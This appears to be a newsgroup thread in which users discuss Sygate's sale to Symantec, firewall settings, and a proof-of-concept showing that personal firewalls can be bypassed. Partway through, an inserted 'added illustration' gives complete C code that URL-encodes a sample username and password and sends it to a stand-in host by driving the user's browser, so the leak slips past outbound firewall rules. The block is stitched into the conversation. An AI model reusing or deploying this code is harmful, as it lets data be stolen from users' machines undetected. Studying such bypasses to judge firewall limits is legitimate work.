Having just read that Sygate was purchased by Symantec, and having just started using Sygate about a month ago, I'm wondering if I should be looking for something else or continue to use Sygate.
Overall, I like Sygate but I'm still in the learning stages.
I realize no one can see the future, but are the upgraded versions really that important? I mean, Sygate is working now, but in six months or a year, would technology outpace it? [Assuming no further upgrades are issued]
Many moons ago, I used ZoneAlarm, but it seemed to get flaky after a while. Version 3, I think. Was using Norton until it expired; it came with a new Dell system.
Currently using: XP Home, Sygate, AVGuard, Firefox, Agent, and both AOL & MSN Messenger.
No other apps have access to the net. If anything comes up and asks to enter or leave the computer, I say no. So far nothing has barfed.
I've been reading this group and a virus group. Learned a lot, but I'm no expert in computers. Just looking for any info about the situation.
I'm sticking with Sygate, the free version, for the next few months. Can't predict what I'll do after that.
Since you just started using it, remember to go to 'Applications' and, on each permitted app, click on 'Advanced' and set 'Act as server' to No unless you specifically need it to serve. It's the one weakness of Sygate, a mistaken default setting. No big. Nex
Hi Tom. Guess I am one of the diehards who will keep using Sygate for as long as possible. It has served me well for 4 years and without causing any problems. When I heard the bad news last week, I began having the same concerns as you. I see it this way:
1) Our installed Sygate contains all of the basic firewall requirements, i.e. control of applications, IPs, ports, and protocols. About the only thing overlooked is local host control (127.0.0.1). Sygate was going to fix that, but I guess they won't get to it :-(.
2) One big concern is the probable loss of signature updates. You didn't say if you have the free or Pro version. Only the Pro has the Intruder Detection System (IDS) and the intrusion signature updates. Compare them at:
I prowled around looking at the files in my Sygate Pro and found trojan.dat. Looks like that is where the downloaded signatures go. It contains a listing of hundreds of trojan applications. If you continue to use Sygate Pro, you might want to make a backup of the file trojan.dat. You could supplement the use of the retained data with a good hosts file:
I've d/led Kerio and am still looking through the manual. I still have to see about a ZA manual. These seem to be the most popular PFWs. The problem I have [and other neophyte users, no doubt] is translating the manual to English.
Yes, of course. This is a proof-of-concept (POC) code sample to show how easy it is to trick "Personal Firewalls". It's written in the programming language C, which is why it's a .c file.
You can compile it to an executable and try it out with Microsoft's MSVC or, e.g., with MinGW.
It sends this information outside: "breakout.html". This is done by using your web browser to send this information, because usually "Personal Firewall" users allow their web browser to communicate, or they cannot use the WWW any more.
Of course, you can send other things than "breakout.html"; anything else also works, and you can send elsewhere than to
because it's just my machine ;-)
I wrote this piece of code because we had such discussions in de.comp.security.misc and de.comp.security.firewall, the German sister groups, too.
Some people claimed that "Personal Firewalls" are secure, and that we just had no idea how a real "Personal Firewall" works.
So I hacked together those few lines of code without ever having seen a "Personal Firewall" before. Ansgar Wiechers made a test with the most common "Personal Firewalls" (Kerio, Norman, Outpost, Sygate, Tiny, ZoneAlarm, Symantec Norton), and they all failed already with such an easy trick.
You should note: this is only the easiest trick I'm aware of. There are many, many other possibilities to tunnel, too.
So we have the proof that a "Personal Firewall" can only control those applications which allow themselves to be controlled. This means they're useless, because you get a packet filter for free with the Windows Firewall anyway.
If you're using Microsoft Windows, then you have to trust Microsoft.
Microsoft Windows is the operating system. The operating system contains the program, the kernel, whose job it is to control all other programs on your system. If you don't trust this program (the Windows kernel), then you cannot trust the complete system. For this point it does not matter whether you add some extra software or not.
BTW: the Windows kernel is not too bad. Up to a limit, I'd trust it. And Microsoft is not the "evil empire" or something; Bill does not run around in a black cloak, and I guess he doesn't have such heavy problems with his breathing ;-) There are much better arguments for free software than "no Microsoft".
OK so far? Well, next...
Tunneling cannot be prohibited without losing the connection. Why this is true, I explained some postings ago. Please read them, thank you ;-)
All you have to do to ignore the control of a "Personal Firewall" for "outbound connections" is to use some tunneling. This was clear before I saw my very first "Personal Firewall" (in fact I never used one, but in the meantime I saw Ansgar Wiechers testing some, and what I saw was a terribly incompetent accumulation of software garbage; I was scared, as I had not realized before how sad those products are).
So I reflected on what would be the easiest way for me to implement tunneling, the one with the least work ;-) I decided to use tunneling through Windows messages and HTTP with the web browser the user uses. This had an extra advantage: the browser usually is an exception and is not castrated by the "Personal Firewall" on any box, I thought, because otherwise there would be no way left for the user to use web pages. So perhaps using the browser was easiest.
I wrote a proof of concept, a POC code; this is what you find on
- and I wrote it for Internet Explorer, because most of the people who come to de.comp.security.* (where I'm reading/writing) and are using "Personal Firewalls" are also using this browser.
Other people tried it out with their "Personal Firewalls", and it bypassed every "Personal Firewall", as expected.
Then the first thing I heard was "but this only works with Internet Explorer, because this browser is so insecure". So I wrote a POC for a second browser, too, Mozilla Firefox, to show that this is not a browser problem. You can find this code on
Meanwhile, Ansgar Wiechers has tested this and many other attacks against many "Personal Firewalls", and none of them managed to prohibit communication to the outside.
This is not surprising if you know that you cannot prohibit tunneling at all; it's technically impossible, it's even theoretically impossible.
The result of this thinking is: you can only control software which is already running on your PC and which either is of good nature and wants to be controlled, or is malware and very dumb and incompetent itself.
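As an added illustration of the browser-tunnel idea described in the two posts above (this is example code written for this page, not the original breakout.c or the Firefox POC the poster links): the program never opens a socket of its own. It packs whatever it wants to leak into a URL and makes the already-permitted browser fetch that URL, so a "Personal Firewall" rule that lets the browser out lets the data out too. The collection host, the `d=` query parameter, and the assumption that the first `Edit` child of the `IEFrame` window is the address bar are assumptions made for the example; on a non-Windows desktop the same trick is shown by handing the URL to `xdg-open`.

```c
/* browser_tunnel.c - added example of the "let the trusted browser do the
 * talking" tunnel. Not the original breakout.c from the thread.
 * Build: cl browser_tunnel.c user32.lib  (Windows)  /  cc browser_tunnel.c (Unix) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>
#ifdef _WIN32
#include <windows.h>
#else
#include <unistd.h>
#endif

/* Hypothetical collection point (assumption); any URL the browser will fetch works. */
#define EXFIL_BASE "http://exfil.example.invalid/breakout?d="

/* Percent-encode arbitrary bytes so they survive inside a query string.
 * Returns the number of characters written (excluding the NUL), or -1 if
 * the output buffer is too small. */
int url_encode(const unsigned char *in, size_t inlen, char *out, size_t outlen)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t o = 0;
    for (size_t i = 0; i < inlen; i++) {
        unsigned char c = in[i];
        int safe = (c >= 'A' && c <= 'Z') || (c >= 'a' && c <= 'z') ||
                   (c >= '0' && c <= '9') || c == '-' || c == '_' ||
                   c == '.' || c == '~';
        if (safe) {
            if (o + 1 >= outlen) return -1;     /* room for char + NUL */
            out[o++] = (char)c;
        } else {
            if (o + 3 >= outlen) return -1;     /* room for %XX + NUL */
            out[o++] = '%';
            out[o++] = hex[c >> 4];
            out[o++] = hex[c & 15];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Build the complete URL carrying the payload. Returns 0 on success, -1 on overflow. */
int build_exfil_url(const unsigned char *data, size_t len, char *url, size_t urllen)
{
    size_t base = strlen(EXFIL_BASE);
    if (base >= urllen) return -1;
    memcpy(url, EXFIL_BASE, base);
    return url_encode(data, len, url + base, urllen - base) < 0 ? -1 : 0;
}

#ifdef _WIN32
/* EnumChildWindows callback: remember the first descendant of class "Edit".
 * Assumption for the example: in IE that is the address-bar edit control. */
static BOOL CALLBACK find_edit(HWND h, LPARAM lp)
{
    char cls[64];
    if (GetClassNameA(h, cls, sizeof cls) && strcmp(cls, "Edit") == 0) {
        *(HWND *)lp = h;
        return FALSE;                            /* stop enumerating */
    }
    return TRUE;
}

/* Type the URL into a running Internet Explorer and press Enter, purely via
 * window messages: the firewall sees only the browser making the request.
 * Returns 0 if a browser window was driven, -1 if none was found. */
int drive_browser(const char *url)
{
    HWND frame = FindWindowA("IEFrame", NULL);   /* IE's top-level window class */
    HWND edit = NULL;
    if (!frame) return -1;
    EnumChildWindows(frame, find_edit, (LPARAM)&edit);
    if (!edit) return -1;
    SendMessageA(edit, WM_SETTEXT, 0, (LPARAM)url);
    PostMessageA(edit, WM_KEYDOWN, VK_RETURN, 0);
    PostMessageA(edit, WM_KEYUP, VK_RETURN, 0);
    return 0;
}
#else
/* Unix equivalent of the same idea: hand the URL to the default browser. */
int drive_browser(const char *url)
{
    if (fork() == 0) {
        execlp("xdg-open", "xdg-open", url, (char *)NULL);
        _exit(127);                              /* exec failed in the child */
    }
    return 0;
}
#endif

int main(void)
{
    /* Constructed sample secret; a real tool would read files, keystrokes, ... */
    const char *secret = "user=alice&pw=hunter2";
    char url[1024];
    if (build_exfil_url((const unsigned char *)secret, strlen(secret), url, sizeof url))
        return 1;
    printf("%s\n", url);
    return drive_browser(url) ? 1 : 0;
}
```

The point to take from it is the one the poster makes: no outbound rule on the leaking process is ever consulted, because the leaking process never talks to the network. Blocking this would mean blocking the browser, or blocking one process from sending messages to another, which is what the "you cannot prohibit tunneling without losing the connection" remark means in practice.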
Agreed, though it should be noted Windows has much more than the kernel. This is, in fact, the same argument that has to be made against binary-only drivers in the Linux kernel.
For the most part, I agree here. However, I personally feel that I cannot trust Microsoft, having personally used five consecutive versions of Windows, all of which did not perform as advertised in one form or another. In addition, Microsoft's security track record is just plain atrocious. Granted, for a while Red Hat wasn't doing a whole lot better, and other GNU/Linux distributions have had rather large gaffes as well. But the cold hard fact is, before Windows was Internet capable, there was *the* Internet worm, as in one. Remember that.
Another problem, not necessarily Microsoft's fault but a large part of it, has to do with the rest of the shrinkwrapped binary-only software industry which they have more or less legitimized. Usually this means getting new software means opening up your wallet and releasing anywhere from $20 to $1,000 or more, or playing Russian roulette with unauthorized copies. I have the desire to do neither, and at the same time bring other players to the game which I may not trust any more than Microsoft.
And that which you can't control, you can always kill, right?
I know. I don't think Microsoft Windows is a highly secure platform or anything. They're getting better with this SP2 stuff for Windows XP now, but there is much work left to do. And Windows is just too complex ever to become a highly secure system, I think.
But: if one doesn't trust Microsoft, then she/he just shouldn't use Windows. That was what I was trying to say.
Unfortunately, this is not true for every malware. You can just protect your PC and keep your eyes open and your brain clear, so you will not get malware running on your box.